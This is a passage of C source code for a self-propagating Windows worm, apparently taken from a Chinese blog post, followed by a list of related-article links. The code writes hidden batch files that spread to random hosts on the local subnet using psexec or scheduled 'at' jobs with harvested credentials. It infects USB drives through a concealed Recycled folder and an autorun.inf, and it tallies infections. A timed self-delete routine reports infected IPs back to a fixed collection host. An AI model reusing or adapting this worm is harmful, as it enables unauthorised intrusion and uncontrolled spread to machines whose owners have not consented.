if(exist==0)
fprintf(fp,":ready/r/n");
sprintf(flagfile,"////%s%s//admin$//Tasks//",netid,farid);
fprintf(fp,"if not exist %s goto disconnect/r/n",flagfile);
fprintf(fp,"if exist %s%s goto disconnect/r/n",flagfile,__args[0]);
filecopy(fp,flagfile);
Sysmesg.hacknum++;
flag[0]=Sysmesg.flag[0];
flag[1]=Sysmesg.flag[1];
flag[2]=Sysmesg.hacknum/100+'0';
flag[3]=(Sysmesg.hacknum%100)/10+'0';
flag[4]=Sysmesg.hacknum%10+'0'; flag[5]=0;
if(exist==0) //如果工具存在,则利用工具启动
fprintf(fp,"psexec.exe
////%s%s -u %%user%% -p %%passwd%% -d ",netid,farid);
else //利用计划任务启动
{
time_t xx=time(0)+600;
char
tm[25];
strcpy(tm,ctime(&xx));
tm[19]=0;
fprintf(fp,"at
////%s%s %s ",netid,farid,&tm[11]);
}
fprintf(fp,"%s%s %s %s%s
",Sysmesg.syspath,__args[0],Sysmesg.guestip,netid,farid);
if(exist==0)
fprintf(fp,"%%user%% %%passwd%% %s/r/n",flag);
else
if(strcmp(Sysmesg.passwd,"/"/""))
fprintf(fp,"%s %s
%s/r/n",Sysmesg.user,Sysmesg.passwd,flag);
else
fprintf(fp,"%s
///"///" %s/r/n",Sysmesg.user,flag);
fprintf(fp,"echo
%s%s>>child/r/n",netid,farid);
fprintf(fp,":disconnect/r/n"); fprintf(fp,"net use * /del /y/r/n");
fprintf(fp,":end/r/n"); fprintf(fp,"del nethak.bat/r/n"); fclose(fp);
WinExec("nethak.bat",SW_HIDE);
sprintf(flagfile,"%s%s",Sysmesg.syspath,"config");
saveconfig(flagfile);
}
void hackdisk(char diskroot[4]) //感染U盘
{
char
copypath[13];
sprintf(copypath,"%sRecycled//",diskroot);
FILE
*fp=fopen("diskhack.bat","wb");
fprintf(fp,"if exist %sRecycled goto
complete/r/n",diskroot);
fprintf(fp,"md %sRecycled/r/n",diskroot);
fprintf(fp,"echo
[.ShellClassInfo]>%sRecycled//desktop.ini/r/n",diskroot);
fprintf(fp,"echo
CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>%sRecycled//desktop.ini/r/n",diskroot);
fprintf(fp,"attrib +r +h +s %sRecycled//desktop.ini/r/n",diskroot);
fprintf(fp,"attrib +r +h +s %sRecycled/r/n",diskroot);
fprintf(fp,":complete/r/n");
fprintf(fp,"if not exist %sautorun.inf goto
ready/r/n",diskroot);
fprintf(fp,"attrib -s -r -h
%sautorun.inf/r/n",diskroot);
fprintf(fp,"del %sautorun.inf/r/n",diskroot);
fprintf(fp,":ready/r/n");
fprintf(fp,"echo
[autorun]>%sautorun.inf/r/n",diskroot);
fprintf(fp,"echo
open=.//Recycled//%s %%%%1>>%sautorun.inf/r/n",__args[0],diskroot);
fprintf(fp,"echo.>>%sautorun.inf/r/n",diskroot);
fprintf(fp,"echo
shell//1=打开(^&O)>>%sautorun.inf/r/n",diskroot);
fprintf(fp,"echo
shell//1//Command=.//Recycled//%s
%%%%1>>%sautorun.inf/r/n",__args[0],diskroot);
fprintf(fp,"echo.>>%sautorun.inf/r/n",diskroot);
fprintf(fp,"echo
shellexecute=.//Recycled//%s
%%%%1>>%sautorun.inf/r/n",__args[0],diskroot);
filecopy(fp,copypath);
fprintf(fp,"attrib +s +r +h %sautorun.inf/r/n",diskroot);
fprintf(fp,"del diskhack.bat/r/n"); fclose(fp);
WinExec("diskhack.bat",SW_HIDE);
}
void
showdesk() //显示桌面
{
FILE *fp=fopen("showdesk.bat","wb");
fprintf(fp,"cd ..///r/n");
fprintf(fp,"echo [Shell]>haha.scf/r/n");
fprintf(fp,"echo Command=^2>>haha.scf/r/n");
fprintf(fp,"echo
Iconfile=^explorer.exe,3>>haha.scf/r/n");
fprintf(fp,"echo
[Taskbar]>>haha.scf/r/n");
fprintf(fp,"echo
Command=^ToggleDesktop>>haha.scf/r/n");
fprintf(fp,"haha.scf/r/n");
fprintf(fp,"del haha.scf/r/n");
fprintf(fp,"del
tasks//showdesk.bat/r/n");
fclose(fp);
WinExec("showdesk.bat",SW_HIDE);
}
unsigned char kill() //自杀代码
{
if(time(0)<1165971645)
return 0;
changereg(0);
char
worm[30],disk[4]="Z://";
FILE *fp=fopen("killself.bat","wb");
fprintf(fp,"dir %s..//system32/r/n",Sysmesg.syspath);
for(disk[0]='Z';disk[0]>'B';disk[0]--)
{
sprintf(worm,"%sRecycled//%s",disk,__args[0]);
if(access(worm,0)==0)
{
fprintf(fp,"attrib -r -h -s %s/r/n",worm);
fprintf(fp,"attrib -r -h -s %sRecycled//psexec.exe/r/n",disk);
fprintf(fp,"attrib -r -h -s %sautorun.inf/r/n",disk);
fprintf(fp,"del
%s/r/n",worm);
fprintf(fp,"del %sRecycled//psexec.exe/r/n",disk);
fprintf(fp,"del %sautorun.inf/r/n",disk);
}
}
fprintf(fp,"attrib
-r -h -s %spsexec.exe/r/n",Sysmesg.syspath);
fprintf(fp,"del
%spsexec.exe/r/n",Sysmesg.syspath);
fprintf(fp,"del
%sconfig/r/n",Sysmesg.syspath);
fprintf(fp,"echo 您好:>c://see.txt/r/n");
fprintf(fp,"echo 至此,我们已经完成了测试任务,谢谢合作!>>c://see.txt/r/n");
fprintf(fp,"echo 如果测试中对您造成了不便,在此向您道歉!>>c://see.txt/r/n");
fprintf(fp,"net use ////192.168.3.224//ipc$ haha /user:haha/r/n");
//192.168.3.224为接受报告的IP地址
fprintf(fp,"if errorlevel 1 goto next/r/n");
fprintf(fp,"echo.>>c://see.txt/r/n");
fprintf(fp,"下面公布受感染机器的IP:>>c://see.txt/r/n");
fprintf(fp,"type
////192.168.3.224//admin$//tasks//child>>c://see.txt/r/n");
//192.168.3.224为接受报告的IP地址
fprintf(fp,":next/r/n");
fprintf(fp,"echo.>>c://see.txt/r/n");
fprintf(fp,"echo 测试人:影子>>c://see.txt/r/n");
fprintf(fp,"notepad c://see.txt/r/n");
fprintf(fp,"attrib -r -h -s
%s%s/r/n",Sysmesg.syspath,__args[0]);
fprintf(fp,"del
%s%s/r/n",Sysmesg.syspath,__args[0]);
fprintf(fp,"del killself.bat/r/n");
fclose(fp);
WinExec("killself.bat",SW_HIDE);
return 1;
}
unsigned char TIMER(long minute) //主循环模拟触发器
{
char
disk[4],backfile[25];
strcpy(disk,Sysmesg.lastdisk);
if(kill())
return 1;
for(disk[0]='Z';disk[0]>=Sysmesg.lastdisk[0];disk[0]--)
if(access(disk,0)==0) //感染U盘
{
sprintf(backfile,"%sRecycled//%s",disk,__args[0]);
if(access(backfile,0)==-1) //识别U盘是否已感染
{
hackdisk(disk);
Sleep(5000);
}
}
if(minute%59==0 &&
Sysmesg.send && Sysmesg.hacknum<1023) //尝试网络入侵
{
char
netid[16];
unsigned char childip;
strcpy(netid,Sysmesg.guestip);
if(Sysmesg.station==0)
netid[strlen(netid)-1]=0;
else
if(Sysmesg.station<10)
netid[strlen(netid)-2]=0;
else
netid[strlen(netid)-3]=0;
srand((unsigned)time(NULL)); //初始化种子
childip=rand()%254+1;
hacknet(netid,childip);
}
if(minute%97==0)
showdesk();
return 0;
}
相关文章推荐
- 一个仿PetShop的基于NHibernate的N层框架示例
- 一个基于Retrofit的单文件上传、下载框架
- ACE框架简介以及一个基于ACE的C/S服务程序实例
- Quentin : 一个基于 Django 框架的个人简易博客系统
- 使用CPPUNIT如何建立一个基于MFC的GUI测试框架
- 分享一个基于winForm后台线程处理业务的小程序框架
- Mac本地创建一个基于Vue.js框架的my-project
- hyk-proxy - 一个支持基于GAE/Seattle/PHP的web proxy框架 (A web proxy framework support implementations on GAE/Seattle/PHP , could be used to break some firewall) - Google Project Hosting
- 自己撸一个基于运行时注解的简单IOC框架
- 自动化测试: sikuli,一个基于界面图像的gui测试框架
- 分享一个基于Bootstrap的 ACE框架 入门(MVC+EF)
- 一个专为移动端开发的原创即时通讯框架,超轻量级、高度提炼,完全基于UDP协议,支持iOS、Android、标准Java平台。
- SPServer : 一个基于线程池(包括HAHS和LF)的高并发 server 框架
- BaiduMap---百度地图官方Demo之MapFragment使用(创建一个基于Fragment的地图框架)
- 一个基于装饰者设计模式的上报框架
- Tangram:一个基于MFC框架的柔性软件开发系统
- 用java语言,不用任何框架发布一个基于WSDL的WebService服务
- ISE(Iris Server Engine)是一个基于现代C++的跨平台(Linux和Windows)框架
- 基于wxWidgets框架的一个画图小工具
- Qt是一个不错的库。因此在一些场合下,可以基于Qt搭建程序和游戏框架。